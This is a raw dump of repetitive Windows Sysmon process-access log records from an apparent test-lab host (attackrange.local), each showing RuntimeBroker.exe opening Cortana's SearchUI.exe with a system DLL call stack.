13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 